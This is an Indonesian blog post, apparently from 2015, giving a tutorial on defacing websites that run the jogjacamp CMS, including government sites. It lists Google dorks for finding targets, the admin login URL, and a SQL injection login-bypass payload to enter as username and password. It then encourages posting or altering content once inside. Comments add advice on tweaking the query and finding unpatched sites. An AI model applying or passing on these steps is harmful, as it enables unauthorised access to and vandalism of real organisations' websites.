Thursday, 14 May 2015

Deface Dengan Bypass admin login jogjacamp

xixihi,, ketemu lagi sama Nuenomaru.
kali ini Nue akan bahas Bypass admin login di web ber CMS jogjacamp ya ^_^
CMS ini sudah banyak kok di pakai oleh web komersial , maupun web pemerintahan di indonesia ^_^
xixixhi,, karna ini Web indo , jadi crotz nya jangan terlalu nganu ya :o





utk bypass admin login yg umum sudah pernah saya share tutornya dimari ..
*perlu diingat bypass admin login sudah banyak methodnya ,, beda web mungkin bugnya juga beda method utk nge bye bye pasword nya :v


yoo langsung step step nya aja :



Dork : 
Developed by jogjacamp inurl:kami
inurl:"index.php?action=admin.main"
(sisanya kembangin sendiri, biar dapat banyak dan masih perawan)


User & Pass : '=' 'or'

halaman login : www.target.go.id/index.php?action=admin.main

kalo sudah masuk ke page login ,, masukin user dan pass yg di atas..

dan taraaa berhasil masuk ..
jika sudah masuk seterah kaka deh mo di apain .. di acak2 kah ?? di edit atau post artikel ?? ubah submenu ?? bodo dah :D btw utk site id jangan parah2 .. sekedar utk buat artikel aja nick ente dh ter index di google :)




Sekian tutor kali ini ^_^
semoga bermanfaat , kalo ada kesalahan tolong maafin Nue  ;)


./Nuenomaru

Nuenomaru just an illusion in Cyber World



Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2

8 comments

wkwkwkwk sikampreett satu ini , komen di artikel mana aja sih wkwkw
btw maaf bgt van wkwkw, baru liat notif komen blog, trnyata kamu komen..
rata2 komennya dari tanggal 7 Desember lagi wwkwkwkw
akuu baru blsnya sekarang wkwkw :3
kalo komen bilang2 apa kampret wkwkw

Nuenomaru

:3 gagal login :3 caranya gimana

mainkan query nya mz :D
kalo tetep gak bisa ya brarti dah di patch mz :D

Salam Sukses

Nuenomaru

maen kan query nya mz,, atau kembangin Dork agar dpt yg fresh :D

rajin praktek -> terus jangan lupa kembangin/oprek

#Nuenomaru


EmoticonEmoticon